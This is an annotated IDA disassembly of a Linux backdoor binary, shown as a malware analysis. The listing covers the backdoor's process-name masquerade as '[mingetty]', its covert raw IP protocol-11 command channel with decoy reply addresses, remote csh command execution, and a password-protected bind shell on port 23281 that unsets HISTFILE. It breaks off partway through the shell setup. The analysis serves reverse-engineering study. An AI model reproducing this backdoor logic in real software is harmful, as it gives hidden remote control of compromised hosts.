;
; +=========================================================================+
; This file is generated by The Interactive Disassembler (IDA)
; Copyright (c) 2001 by DataRescue sa/nv,
; Licensed to: M. D. Messier, Secure Software Solutions, std, 10/2001
; +=========================================================================+
;
; File Name : M:\the-binary
; Format    : ELF (Executable)
;
; Analyst summary (everything below is taken from this listing only):
;  * main() refuses to run unless geteuid() == 0, overwrites argv[0] with
;    "[mingetty]", double-forks with setsid(), chdir("/"), closes fds 0-2 and
;    ignores SIGHUP/SIGTERM/SIGCHLD -- i.e. it daemonises and hides its name.
;  * Command channel: a PF_INET SOCK_RAW socket for IP protocol 11 (NVP-II).
;    A datagram is accepted only when iphdr.protocol == 0x0B, the first byte
;    after the 20-byte IP header is 2, and more than 200 bytes were received.
;    decode_input() unpacks the payload into cmdbuf and cmdbuf[1] (1..12)
;    selects one of twelve handlers via the jump table off_804832C.
;  * Replies (cases 0x0 and 0x2) are raw protocol-11 packets whose 2-byte
;    data header starts with 3, sent by broadcast_packet()/send_packet() to a
;    10-entry address list; case 0x1 fills that list, normally with 9 random
;    decoy addresses plus one real one.
;  * Host/network indicators visible here: process name "[mingetty]", temp
;    file "/tmp/.hj237349", IP protocol 11 traffic, a TCP listener on port
;    0x5AF1 = 23281 (case 0x5; the word 0F15Ah is stored little-endian) that
;    unsets HISTFILE before exec'ing /bin/sh, and /bin/csh run via system().
;
; NOTE(review): the irpc/ifnb operands (<string>, <zero>) of the unicode
; macro appear to have been lost when this listing was extracted.
unicode macro page,string,zero
        irpc c,
        db '&c', page
        endm
        ifnb
        dw zero
        endif
        endm

        model flat

; ===========================================================================

; Segment type: Pure code
_init segment para public 'CODE' use32
        assume cs:_init
        ;org 8048080h
        assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing

; =============== S U B R O U T I N E =======================================

; Attributes: hidden

; ELF .init entry: runs the static constructor helper sub_80675A8 (not in this
; listing) and returns. Called once from start.
_init_proc proc near ; CODE XREF: start+51p
        call sub_80675A8
        retn 0
_init_proc endp

_init ends

; ===========================================================================

; Segment type: Pure code
_text segment para public 'CODE' use32
        assume cs:_text
        ;org 8048090h
        assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame hidden

; Program entry (statically linked libc startup code).  Recovers argc/argv/
; envp from the initial stack, calls sys_personality(0), sets __environ and
; the FPU control word, runs libc init, registers _term_proc with atexit(),
; runs _init_proc and then main(); main's return value is passed to exit().
; The trailing loc_8048100 loop is the fallback if exit() ever returns.
start proc near

var_C = dword ptr -0Ch

        pop ecx                 ; ecx = argc
        mov ebx, esp            ; ebx = argv
        mov eax, esp
        mov edx, ecx
        add edx, edx
        add edx, edx            ; edx = argc * 4
        add eax, edx
        add eax, 4              ; eax = envp = argv + argc + 1
        xor ebp, ebp            ; outermost frame pointer = 0
        push ebp
        push ebp
        push ebp
        mov ebp, esp
        push eax ; environment pointer
        push ebx ; argument pointer
        push ecx ; argument count
        mov eax, 136
        mov ebx, 0
        int 80h ; LINUX - sys_personality(0)
        mov eax, [esp+14h+var_C] ; reload envp saved above
        mov __environ, eax ; environment pointer handed to libc
        movzx eax, __fpu_control
        push eax
        call __setfpucw
        add esp, 4
        call __libc_init
        push offset _term_proc
        call atexit             ; _term_proc (-> sub_8048110) runs at exit
        add esp, 4
        call _init_proc
        call main
        push eax
        call exit               ; exit(main(argc, argv, envp))
        pop ebx                 ; not reached unless exit() returns
        db 8Dh,0B4h,26h,0,0,0,0 ; lea esi, [esi+0]  (alignment padding)
        db 8Dh,0B4h,26h,0,0,0,0 ; lea esi, [esi+0]

loc_8048100: ; CODE XREF: start+77j
        mov eax, 1
        int 80h ; LINUX - sys_exit
        jmp short loc_8048100   ; loop forever if the syscall returns
start endp

; ---------------------------------------------------------------------------
        db 8Dh, 0B4h, 26h, 4 dup(0)

; =============== S U B R O U T I N E =======================================

; Attributes: hidden

; Walks the NULL-terminated array of function pointers beginning at
; dword_80792B8 and calls each entry in order.  Reached from _term_proc, so
; these run at process exit (presumably the static destructor list -- the
; table contents are not in this listing).
sub_8048110 proc near ; CODE XREF: _term_procp
        push ebx
        mov ebx, offset dword_80792B8
        cmp ds:dword_80792B8, 0 ; empty table -> nothing to do
        jz short loc_804812C
        nop

loc_8048120: ; CODE XREF: sub_8048110+1Aj
        mov eax, [ebx]
        call eax                ; (*fn)()
        add ebx, 4
        cmp dword ptr [ebx], 0  ; stop at the terminating NULL
        jnz short loc_8048120

loc_804812C: ; CODE XREF: sub_8048110+Dj
        pop ebx
        retn
sub_8048110 endp

; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
        retn
; ---------------------------------------------------------------------------
        db 3 dup(90h)

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame hidden

; main(argc, argv): root check, process-name masquerade, daemonise, then an
; endless loop reading raw IP protocol-11 datagrams and dispatching on the
; decoded command byte.  Globals used:
;   child_pid      - pid of the current long-running task child (0 = none);
;                    cases 3,4,5,8,9,a,b refuse to start while it is set,
;                    case 7 kills it.
;   dword_807E778  - id of the task currently running in child_pid (4..0xC),
;                    reported back in the case-0 status reply.
;   dword_807E770  - pid stored by the fork() in cases 2 and 6.
;   cmdbuffbyte1   - address-list mode byte set by case 1 (0, 2 or other).
;   dataptr..byte_807E783 - 4-byte IP source address used for replies.
; Stack buffers: cmdbuf and tmpbuf are 0x800 bytes each, buf400 is 0x190,
; addrlist is 0x28 (10 x 4-byte addresses), var_44BC is 0x100.
main proc near ; CODE XREF: start+56p

numhosts = dword ptr -44F0h
var_44EC = dword ptr -44ECh
ptr_buf400 = dword ptr -44E8h
ptr_addrlist = dword ptr -44E4h
ptr_cmdbuf = dword ptr -44E0h
fd = dword ptr -44DCh
ptr_data = dword ptr -44D8h
ptr_datahdr = dword ptr -44D4h
ptr_tmpbuf = dword ptr -44D0h
clientfd = dword ptr -44CCh
sockfd = dword ptr -44C8h
init_as_16 = dword ptr -44C4h
init_as_1 = dword ptr -44C0h
var_44BC = byte ptr -44BCh
var_43BC = byte ptr -43BCh
accept_addr = byte ptr -11D8h
listen_addr = byte ptr -11C8h
addrlist = byte ptr -11B8h
buf400 = byte ptr -1190h
cmdbuf = byte ptr -1000h
tmpbuf = byte ptr -800h
argc = dword ptr 8
argv = dword ptr 0Ch

        push ebp
        mov ebp, esp
        sub esp, 44F0h
        push edi
        push esi
        push ebx
        mov ebx, [ebp+argv]
        mov [ebp+init_as_1], 1
        lea edx, [ebp+tmpbuf]
        mov [ebp+ptr_tmpbuf], edx ; &tmpbuf  (received IP header starts here)
        lea ecx, [ebp+tmpbuf+14h]
        mov [ebp+ptr_datahdr], ecx ; tmpbuf + 20: 2-byte data header after iphdr
        lea edx, [ebp+tmpbuf+16h]
        mov [ebp+ptr_data], edx ; tmpbuf + 22: start of encoded command
        mov [ebp+init_as_16], 10h
        call geteuid
        test eax, eax ; check for super-user
        jz short loc_804818C ; yes, we're superuser!
        push 0FFFFFFFFh ; no, we're not: exit(-1)
        call exit
        nop

loc_804818C: ; CODE XREF: main+4Ej
        ; memset(argv[0], 0, strlen(argv[0])) -- inline strlen via repne scasb
        mov edx, [ebx]          ; edx = argv[0]
        xor al, al
        mov edi, edx
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb
        mov eax, ecx
        not eax
        dec eax                 ; eax = strlen(argv[0])
        push eax
        push 0
        push edx
        call memset
        ; copy the 11 bytes of "[mingetty]\0" over argv[0] so the process
        ; shows up under a getty-like name in ps
        mov edx, [ebx]
        mov eax, dword ptr ds:aMingetty ; "[mingetty]"
        mov [edx], eax
        mov eax, dword ptr ds:aMingetty+4
        mov [edx+4], eax
        mov ax, word ptr ds:aMingetty+8
        mov [edx+8], ax
        mov al, byte ptr ds:aMingetty+0Ah
        mov [edx+0Ah], al
        push 1 ; SIG_IGN
        push 11h ; SIGCHLD
        call signal
        call fork
        add esp, 14h
        test eax, eax
        jz short loc_80481E8    ; child continues
        push 0
        call exit               ; parent exits

loc_80481E8: ; CODE XREF: main+ABj
        call setsid             ; new session, no controlling tty
        push 1 ; SIG_IGN
        push 11h ; SIGCHLD
        call signal
        call fork
        add esp, 8
        test eax, eax
        jz short loc_804820C    ; grandchild continues
        push 0
        call exit
        db 8Dh,76h,0 ; lea esi, [esi+0] ; *NOTREACHED*

loc_804820C: ; CODE XREF: main+CCj
        push offset aSlash ; "/"
        call chdir ; chdir("/")
        push 0
        call close ; close(fileno(stdin))
        push 1
        call close ; close(fileno(stdout))
        push 2
        call close ; close(fileno(stderr))
        mov ds:child_pid, 0
        mov ds:dword_807E770, 0
        mov ds:dword_807E778, 0
        push 0
        call time
        add esp, 14h ; cleanup previous 5 calls
        push eax
        call __srandom          ; srandom(time(NULL))
        add esp, 4
        push 0Bh ; NVP-II
        push 3 ; SOCK_RAW
        push 2 ; PF_INET
        call socket             ; command channel: raw socket, IP protocol 11
        mov [ebp+sockfd], eax   ; NOTE: return value is not checked
        push 1 ; SIG_IGN
        push 1 ; SIGHUP
        call signal
        push 1 ; SIG_IGN
        push 0Fh ; SIGTERM
        call signal
        push 1 ; SIG_IGN
        push 11h ; SIGCHLD
        call signal
        add esp, 24h ; clean up previous 3 calls
        push 1 ; SIG_IGN
        push 11h ; SIGCHLD
        call signal
        add esp, 8
        lea ecx, [ebp+cmdbuf]
        mov [ebp+ptr_cmdbuf], ecx
        lea edx, [ebp+addrlist]
        mov [ebp+ptr_addrlist], edx
        nop

; Main receive loop.  Every handler ends by jumping to loc_8048EB8 (default),
; which sleeps 10 ms and comes back here.
process_command_packet: ; CODE XREF: main+D91j
        push 0 ; flags
        push 800h ; bufferlen
        lea eax, [ebp+tmpbuf]
        push eax ; buffer
        mov ecx, [ebp+sockfd]
        push ecx ; sockfd
        call recv
        mov esi, eax ; # bytes received (-1 on error also fails the >200 test)
        add esp, 10h
        mov edx, [ebp+ptr_tmpbuf]
        cmp byte ptr [edx+9], 0Bh ; check protocol in iphdr
        jnz loc_8048EB8 ; default
        mov ecx, [ebp+ptr_datahdr]
        cmp byte ptr [ecx], 2 ; first data byte must be 2 (controller -> agent)
        jnz loc_8048EB8 ; default
        cmp esi, 0C8h ; packet length (incl. iphdr) must be at least 200 bytes
        jle loc_8048EB8 ; default
        mov edx, [ebp+ptr_cmdbuf]
        push edx ; destination buffer
        mov ecx, [ebp+ptr_data]
        push ecx ; source (2 bytes offset into data rec'd)
        lea eax, [esi-16h]
        push eax ; number of bytes in the source buffer (len - 20 - 2)
        call decode_input ; decode_input(len, src, dst)
        add esp, 0Ch
        movzx eax, [ebp+cmdbuf+1] ; 2nd char of destination buffer
        dec eax
        cmp eax, 0Bh ; switch 12 cases
        ja loc_8048EB8 ; default
        jmp ds:off_804832C[eax*4] ; switch (cmdbuf[1] - 1)
; ---------------------------------------------------------------------------
off_804832C dd offset case0x0 ; DATA XREF: main+1F1r
                        ; jump table for switch statement
        dd offset case0x1 ; case 0x1
        dd offset case0x2 ; case 0x2
        dd offset case0x3 ; case 0x3
        dd offset case0x4 ; case 0x4
        dd offset case0x5 ; case 0x5
        dd offset case0x6 ; case 0x6
        dd offset case0x7 ; case 0x7
        dd offset case0x8 ; case 0x8
        dd offset case0x9 ; case 0x9
        dd offset case0xa ; case 0xa
        dd offset case0xb ; case 0xb
; ---------------------------------------------------------------------------

; case 0x0: status reply.  Builds a 5-byte record in tmpbuf:
;   [0] = low byte of dword_807E77C, [1] = 1, [2] = 7,
;   [3] = 1 if a task child is running (then [4] = task id) else 0,
; encodes 400 bytes of it into cmdbuf and broadcasts it with a random
; length of 400..600.
case0x0: ; CODE XREF: main+1F1j
                        ; DATA XREF: main+1F8o
        mov al, ds:null_byte ; case 0x0
        mov [ebp+tmpbuf], al ; put null at start of tmpbuf (overwritten below)
        mov eax, ds:dword_807E77C
        mov [ebp+tmpbuf], al
        mov [ebp+tmpbuf+1], 1
        mov [ebp+tmpbuf+2], 7
        cmp ds:child_pid, 0
        jz short loc_80483A0
        mov [ebp+tmpbuf+3], 1
        mov eax, ds:dword_807E778 ; id of the running task (0 until one starts)
        mov [ebp+tmpbuf+4], al
        jmp short loc_80483A7
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------

loc_80483A0: ; CODE XREF: main+254j
        mov [ebp+tmpbuf+3], 0

loc_80483A7: ; CODE XREF: main+268j
        mov edx, [ebp+ptr_cmdbuf]
        push edx
        lea eax, [ebp+tmpbuf]
        push eax
        push 190h
        call encode_input       ; encode_input(400, tmpbuf, cmdbuf)
        call random
        mov ecx, 0C9h
        cdq ; sign extend eax random result into edx:eax quadword - edx will be filled with sign bit of original eax
        idiv ecx ; mod random quadword by 0xC9
        mov ebx, edx ; put mod doubleword of result in ebx (0..200)
        lea eax, [ebx+190h] ; range is 400 to 600
        push eax
        mov edx, [ebp+ptr_cmdbuf]
        push edx
        mov ecx, [ebp+ptr_addrlist]
        push ecx
        call broadcast_packet ; broadcast_packet(addrlist /* 40 bytes */, cmdbuf, 400 + random() % 201)
        add esp, 18h
        jmp loc_8048EB8 ; default
; ---------------------------------------------------------------------------

; case 0x1: set up the reply path.
;   cmdbuffbyte1 = cmdbuf[2] (address-list mode);
;   dataptr[0..3] = bytes 16..19 of the received IP header, i.e. the
;   destination address the command arrived at, later used as the reply's
;   source address by send_packet();
;   then the 10-entry addrlist is filled: mode 2 copies ten addresses from
;   cmdbuf[3..], any other mode fills entries with random bytes (decoys) and
;   finally stores the real address cmdbuf[3..6] at slot edi (random()%10,
;   forced to 0 when mode is 0).  The loop skips slot edi, so in mode 2 that
;   slot keeps its previous contents.
case0x1: ; CODE XREF: main+1F1j
                        ; DATA XREF: main+1FCo
        movzx edx, [ebp+cmdbuf+2] ; case 0x1
        mov ds:cmdbuffbyte1, edx
        mov al, [ebp+tmpbuf+10h]
        mov ds:dataptr, al
        mov al, [ebp+tmpbuf+11h]
        mov ds:byte_807E781, al
        mov al, [ebp+tmpbuf+12h]
        mov ds:byte_807E782, al
        mov al, [ebp+tmpbuf+13h]
        mov ds:byte_807E783, al
        push 0
        call time
        add esp, 4
        push eax
        call __srandom          ; re-seed with the current time
        add esp, 4
        call random
        mov ecx, 0Ah
        cdq
        idiv ecx
        mov edi, edx            ; edi = random() % 10 = slot of the real address
        xor ebx, ebx            ; ebx = entry index 0..9
        xor esi, esi            ; esi = byte offset ebx * 4
        nop

loc_8048454: ; CODE XREF: main+3FEj
        cmp ebx, edi
        jz loc_804852B          ; leave slot edi alone
        cmp ds:cmdbuffbyte1, 2
        jnz short loc_8048498   ; not mode 2 -> random decoy entry
        mov al, [ebp+ebx*4+cmdbuf+3]
        mov edx, [ebp+ptr_addrlist]
        mov [edx+esi], al
        mov al, [ebp+ebx*4+cmdbuf+4]
        mov [esi+edx+1], al
        mov al, [ebp+ebx*4+cmdbuf+5]
        mov [esi+edx+2], al
        mov al, [ebp+ebx*4+cmdbuf+6]
        jmp loc_8048527
; ---------------------------------------------------------------------------
        align 4

; Four random bytes for one decoy entry.  Only al (low byte of random()) is
; stored; the numhosts stores are never read in this listing.
loc_8048498: ; CODE XREF: main+32Fj
        call random
        mov [ebp+numhosts], eax
        test eax, eax
        jge short loc_80484B3
        lea ecx, [eax+0FFh]
        mov [ebp+numhosts], ecx

loc_80484B3: ; CODE XREF: main+371j
        mov edx, [ebp+ptr_addrlist]
        mov [esi+edx], al
        call random
        mov [ebp+numhosts], eax
        test eax, eax
        jge short loc_80484D7
        lea ecx, [eax+0FFh]
        mov [ebp+numhosts], ecx

loc_80484D7: ; CODE XREF: main+395j
        mov edx, [ebp+ptr_addrlist]
        mov [esi+edx+1], al
        call random
        mov [ebp+numhosts], eax
        test eax, eax
        jge short loc_80484FC
        lea ecx, [eax+0FFh]
        mov [ebp+numhosts], ecx

loc_80484FC: ; CODE XREF: main+3BAj
        mov edx, [ebp+ptr_addrlist]
        mov [esi+edx+2], al
        call random
        mov [ebp+numhosts], eax
        test eax, eax
        jge short loc_8048521
        lea ecx, [eax+0FFh]
        mov [ebp+numhosts], ecx

loc_8048521: ; CODE XREF: main+3DFj
        mov edx, [ebp+ptr_addrlist]

loc_8048527: ; CODE XREF: main+35Ej
        mov [esi+edx+3], al

loc_804852B: ; CODE XREF: main+322j
        add esi, 4
        inc ebx
        cmp ebx, 9
        jle loc_8048454
        mov eax, ds:cmdbuffbyte1
        test eax, eax
        jnz short loc_8048543
        xor edi, edi            ; mode 0: real address always goes to slot 0

loc_8048543: ; CODE XREF: main+40Bj
        cmp eax, 2
        jz loc_8048EB8 ; default (mode 2: list already complete)
        shl edi, 2
        mov [ebp+var_44EC], edi
        mov al, [ebp+cmdbuf+3]
        mov ecx, [ebp+ptr_addrlist]
        mov [edi+ecx], al
        mov al, [ebp+cmdbuf+4]
        mov edx, [ebp+var_44EC]
        mov [edx+ecx+1], al
        mov al, [ebp+cmdbuf+5]
        mov [edx+ecx+2], al
        mov al, [ebp+cmdbuf+6]
        mov [edx+ecx+3], al
        jmp loc_8048EB8 ; default
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------

; case 0x2: run a shell command and return its output.
; Parent returns to the loop.  The child calls setsid() and forks again:
;  - the intermediate process sleeps 10 s and then calls
;    kill(dword_807E770, SIGKILL); in this process dword_807E770 holds the
;    0 returned by fork() in the child, and kill(0, sig) targets the caller's
;    process group -- a 10-second watchdog on the command below;
;  - the grandchild strips the 2-byte header off cmdbuf, runs
;    /bin/csh -f -c "<cmd>" 1> /tmp/.hj237349 2>&1 via system(), then
;    reads the file back in 398-byte chunks and sends each one as a reply
;    (cmdbuf[1] = 3 for the first chunk, 4 for the rest), 400 ms apart,
;    and finally unlinks the temp file.
case0x2: ; CODE XREF: main+1F1j
                        ; DATA XREF: main+200o
        call fork ; case 0x2
        mov ds:dword_807E770, eax
        test eax, eax
        jnz loc_8048EB8 ; default (parent)
        call setsid
        push 1 ; SIG_IGN
        push 11h ; SIGCHLD
        call signal
        call fork
        add esp, 8
        test eax, eax
        jz short loc_80485D8
        push 0Ah
        call sleep              ; sleep(10)
        push 9
        mov eax, ds:dword_807E770
        push eax
        call kill               ; kill(dword_807E770, SIGKILL)
        push 0
        call exit
        nop

loc_80485D8: ; CODE XREF: main+486j
        xor ebx, ebx
        lea esi, [esi]

loc_80485DC: ; CODE XREF: main+4BDj
        mov al, [ebx+ebp-0FFEh] ; cmdbuf[ebx + 2]
        mov [ebx+ebp-1000h], al ; cmdbuf[ebx]
        inc ebx
        cmp ebx, 18Dh
        jle short loc_80485DC
        push offset aTmp_hj237349 ; "/tmp/.hj237349"
        mov ecx, [ebp+ptr_cmdbuf]
        push ecx
        push offset aBinCshFCS1S21 ; "/bin/csh -f -c \"%s\" 1> %s 2>&1"
        lea ebx, [ebp+tmpbuf]
        push ebx
        call sprintf            ; command text is interpolated unquoted
        push ebx
        call system
        push offset aRb ; "rb"
        push offset aTmp_hj237349 ; "/tmp/.hj237349"
        call fopen
        mov [ebp+fd], eax
        add esp, 1Ch
        test eax, eax
        jz loc_8048712          ; no output file -> just _exit(0)
        xor edi, edi            ; edi = 0 until the first chunk is sent
        lea edx, [ebp+buf400]
        mov [ebp+ptr_buf400], edx

loc_8048644: ; CODE XREF: main+5BFj
        mov ecx, [ebp+fd]
        push ecx
        push 18Eh
        push 1
        lea eax, [ebp+tmpbuf]
        push eax
        call fread              ; esi = fread(tmpbuf, 1, 398, fd)
        mov esi, eax
        mov [esi+ebp+tmpbuf], 0 ; NUL-terminate the chunk
        xor ebx, ebx
        add esp, 10h
        db 8Dh,76h,0 ; lea esi, [esi+0]

loc_8048670: ; CODE XREF: main+551j
        mov al, [ebx+ebp+tmpbuf]
        mov [ebx+ebp+cmdbuf+2], al ; cmdbuf[2..] = chunk
        inc ebx
        cmp ebx, 18Dh
        jle short loc_8048670
        test edi, edi
        jnz short loc_804869C
        mov [ebp+cmdbuf+1], 3   ; first chunk of output
        mov edi, 1
        jmp short loc_80486A3
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------

loc_804869C: ; CODE XREF: main+555j
        mov [ebp+cmdbuf+1], 4   ; continuation chunk

loc_80486A3: ; CODE XREF: main+563j
        mov edx, [ebp+ptr_buf400]
        push edx
        mov ecx, [ebp+ptr_cmdbuf]
        push ecx
        push 190h
        call encode_input       ; encode_input(400, cmdbuf, buf400)
        call random
        mov ecx, 0C9h
        cdq
        idiv ecx
        mov ebx, edx
        lea eax, [ebx+190h]     ; 400 + random() % 201
        push eax
        mov edx, [ebp+ptr_buf400]
        push edx
        mov ecx, [ebp+ptr_addrlist]
        push ecx
        call broadcast_packet
        push 61A80h
        call usleep             ; usleep(400000)
        add esp, 1Ch
        test esi, esi
        jnz loc_8048644         ; until fread() returns 0
        mov edx, [ebp+fd]
        push edx
        call fclose
        push offset aTmp_hj237349 ; "/tmp/.hj237349"
        call unlink
        add esp, 8

loc_8048712: ; CODE XREF: main+4FCj
        push 0
        call _exit
        db 8Dh,76h,0 ; lea esi, [esi+0]

; case 0x3: start task 4 in a child (refused while child_pid != 0).
; The child copies cmdbuf into var_44BC, shifts var_44BC down by 9 bytes
; (the string argument begins at cmdbuf[9]) and calls
;   sub_8049174(cmdbuf[2], cmdbuf[3], cmdbuf[4], cmdbuf[5], 0,
;               cmdbuf[6], cmdbuf[7], cmdbuf[8], var_44BC)
; -- per sub_8049174's parameter names: 4 source-address bytes, lookup_step,
; srcport_hi, srcport_lo, use_srchost, srchost.
case0x3: ; CODE XREF: main+1F1j
                        ; DATA XREF: main+204o
        cmp ds:child_pid, 0 ; case 0x3
        jnz loc_8048EB8 ; default
        mov ds:dword_807E778, 4
        call fork
        mov ds:child_pid, eax
        test eax, eax
        jnz loc_8048EB8 ; default (parent)
        lea edi, [ebp+var_44BC]
        lea esi, [ebp+cmdbuf]
        cld
        mov ecx, 3Fh
        repe movsd
        movsw
        movsb                   ; 255-byte copy of cmdbuf
        xor ebx, ebx
        lea esi, [esi]

loc_8048760: ; CODE XREF: main+641j
        mov al, [ebx+ebp-44B3h] ; var_44BC[ebx + 9]
        mov [ebx+ebp-44BCh], al ; var_44BC[ebx]
        inc ebx
        cmp ebx, 0FEh
        jle short loc_8048760
        lea eax, [ebp+var_44BC]
        push eax                ; srchost
        movzx eax, [ebp+cmdbuf+8]
        push eax                ; use_srchost
        movzx eax, [ebp+cmdbuf+7]
        push eax                ; srcport_lo
        movzx eax, [ebp+cmdbuf+6]
        push eax                ; srcport_hi
        push 0                  ; lookup_step
        movzx eax, [ebp+cmdbuf+5]
        push eax                ; srcaddr_d
        movzx eax, [ebp+cmdbuf+4]
        push eax                ; srcaddr_c
        movzx eax, [ebp+cmdbuf+3]
        push eax                ; srcaddr_b
        movzx eax, [ebp+cmdbuf+2]
        push eax                ; srcaddr_a
        call sub_8049174
        add esp, 24h
        push 0
        call _exit
        nop

; case 0x4: start task 5.  Same shape as case 0x3 but the string argument
; starts at cmdbuf[0xD] and the callee is sub_80499F4(cmdbuf[2..0xC],
; var_44BC) (12 arguments; sub_80499F4 is not in this listing).
case0x4: ; CODE XREF: main+1F1j
                        ; DATA XREF: main+208o
        cmp ds:child_pid, 0 ; case 0x4
        jnz loc_8048EB8 ; default
        mov ds:dword_807E778, 5
        call fork
        mov ds:child_pid, eax
        test eax, eax
        jnz loc_8048EB8 ; default
        lea edi, [ebp+var_44BC]
        lea esi, [ebp+cmdbuf]
        cld
        mov ecx, 3Fh
        repe movsd
        movsw
        movsb
        xor ebx, ebx
        lea esi, [esi]

loc_804880C: ; CODE XREF: main+6EDj
        mov al, [ebx+ebp-44AFh] ; var_44BC[ebx + 0xD]
        mov [ebx+ebp-44BCh], al
        inc ebx
        cmp ebx, 0FEh
        jle short loc_804880C
        lea eax, [ebp+var_44BC]
        push eax
        movzx eax, [ebp+cmdbuf+0Ch]
        push eax
        movzx eax, [ebp+cmdbuf+0Bh]
        push eax
        movzx eax, [ebp+cmdbuf+0Ah]
        push eax
        movzx eax, [ebp+cmdbuf+9]
        push eax
        movzx eax, [ebp+cmdbuf+8]
        push eax
        movzx eax, [ebp+cmdbuf+7]
        push eax
        movzx eax, [ebp+cmdbuf+6]
        push eax
        movzx eax, [ebp+cmdbuf+5]
        push eax
        movzx eax, [ebp+cmdbuf+4]
        push eax
        movzx eax, [ebp+cmdbuf+3]
        push eax
        movzx eax, [ebp+cmdbuf+2]
        push eax
        call sub_80499F4
        add esp, 30h
        push 0
        call _exit
        db 8Dh,76h,0 ; lea esi, [esi+0]

; case 0x5: start task 6 -- a password-protected TCP bind shell.
; The child listens on INADDR_ANY, port word 0F15Ah (bytes 5A F1 in memory,
; i.e. network-order 0x5AF1 = 23281), backlog 3, SO_REUSEADDR set, with
; SIGCHLD/SIGHUP/SIGTERM/SIGINT ignored.  For each accepted connection a
; further child reads up to 19 bytes, cuts the line at CR/LF, increments
; every remaining byte by one and compares 6 bytes against "TfOjG\0".
; On match: stdin/stdout/stderr are dup2'd onto the socket, PATH and
; TERM are set, HISTFILE is unset (no shell history is written), and
; /bin/sh is exec'd.  On mismatch 4 bytes from unk_806761D are sent back
; and the connection is closed.
case0x5: ; CODE XREF: main+1F1j
                        ; DATA XREF: main+20Co
        cmp ds:child_pid, 0 ; case 0x5
        jnz loc_8048EB8 ; default
        mov ds:dword_807E778, 6
        push 1 ; SIG_IGN
        push 11h ; SIGCHLD
        call signal ; signal(SIGCHLD, SIG_IGN)
        call fork
        mov ds:child_pid, eax
        add esp, 8
        test eax, eax
        jnz loc_8048EB8 ; default (parent)
        call setsid
        push 1 ; SIG_IGN
        push 11h ; SIGCHLD
        call signal ; signal(SIGCHLD, SIG_IGN)
        mov word ptr [ebp+listen_addr], 2 ; listen_addr.sin_family = AF_INET
        add esp, 8
        mov word ptr [ebp+listen_addr+2], 0F15Ah ; listen_addr.sin_port = 0xF15A (little-endian store -> port 23281 on the wire)
        mov dword ptr [ebp+listen_addr+4], 0 ; listen_addr.sin_addr.s_addr = INADDR_ANY
        mov [ebp+init_as_1], 1
        push 0
        push 1 ; SOCK_STREAM
        push 2 ; PF_INET
        call socket ; socket(PF_INET, SOCK_STREAM, 0)
        mov [ebp+sockfd], eax   ; not checked for -1
        push 1 ; SIG_IGN
        push 11h ; SIGCHLD
        call signal ; signal(SIGCHLD, SIG_IGN)
        push 1 ; SIG_IGN
        push 11h ; SIGCHLD
        call signal ; signal(SIGCHLD, SIG_IGN)
        push 1 ; SIG_IGN
        push 1 ; SIGHUP
        call signal ; signal(SIGHUP, SIG_IGN)
        add esp, 24h
        push 1 ; SIG_IGN
        push 0Fh ; SIGTERM
        call signal ; signal(SIGTERM, SIG_IGN)
        push 1 ; SIG_IGN
        push 2 ; SIGINT
        call signal ; signal(SIGINT, SIG_IGN)
        push 4 ; sizeof(int)
        lea eax, [ebp+init_as_1]
        push eax ; &init_as_1
        push 2 ; SO_REUSEADDR
        push 1 ; SOL_SOCKET
        mov ecx, [ebp+sockfd]
        push ecx ; sockfd
        call setsockopt ; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &init_as_1, sizeof(int))
        add esp, 24h
        push 10h ; sizeof(listen_addr)
        lea eax, [ebp+listen_addr]
        push eax ; &listen_addr
        mov edx, [ebp+sockfd]
        push edx ; sockfd
        call bind ; bind(sockfd, &listen_addr, sizeof(listen_addr)) -- result ignored
        push 3
        mov ecx, [ebp+sockfd]
        push ecx ; sockfd
        call listen ; listen(sockfd, 3)
        add esp, 14h
        nop

loc_8048984: ; CODE XREF: main+882j
        lea eax, [ebp+init_as_16]
        push eax ; &init_as_16
        lea eax, [ebp+accept_addr]
        push eax ; &accept_addr
        mov edx, [ebp+sockfd]
        push edx ; sockfd
        call accept ; accept(sockfd, &accept_addr, &init_as_16)
        mov [ebp+clientfd], eax
        add esp, 0Ch
        test eax, eax
        jz loc_8048AC4          ; only fd 0 ends the loop; -1 (error) is retried
        call fork
        test eax, eax
        jnz short loc_8048984   ; parent: back to accept()
        push 0
        push 13h
        lea eax, [ebp+var_43BC]
        push eax ; var_43BC
        mov ecx, [ebp+clientfd]
        push ecx ; clientfd
        call recv ; recv(clientfd, var_43BC, 0x13, 0)
        xor ebx, ebx
        add esp, 10h

; Normalise the 19 received bytes: CR or LF terminates the string,
; every other byte is rewritten as (byte + 1).
loc_80489D4: ; CODE XREF: main+8CEj
        mov al, [ebx+ebp+var_43BC]
        cmp al, 0Ah
        jz short loc_80489E3
        cmp al, 0Dh
        jnz short loc_80489F0

loc_80489E3: ; CODE XREF: main+8A9j
        mov [ebx+ebp+var_43BC], 0
        jmp short loc_80489FE
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------

loc_80489F0: ; CODE XREF: main+8ADj
        mov [ebx+ebp+var_43BC], al
        inc [ebx+ebp+var_43BC]

loc_80489FE: ; CODE XREF: main+8B7j
        inc ebx
        cmp ebx, 12h
        jle short loc_80489D4
        lea esi, [ebp+var_43BC]
        mov edi, offset aTfojg ; "TfOjG"
        mov ecx, 6              ; 5 chars + terminating NUL
        cld
        test al, 0              ; ZF=1 so an empty compare counts as equal
        repe cmpsb
        jz short loc_8048A44    ; match -> spawn shell
        push 0
        push 4
        push offset unk_806761D
        mov edx, [ebp+clientfd]
        push edx
        call send               ; send(clientfd, unk_806761D, 4, 0)
        mov ecx, [ebp+clientfd]
        push ecx
        call close
        push 1
        call exit
        nop

loc_8048A44: ; CODE XREF: main+8E5j
        push 0
        mov edx, [ebp+clientfd]
        push edx
        call dup2               ; dup2(clientfd, 0)
        push 1
        mov ecx, [ebp+clientfd]
        push ecx
        call dup2               ; dup2(clientfd, 1)
        push 2
        mov edx, [ebp+clientfd]
        push edx
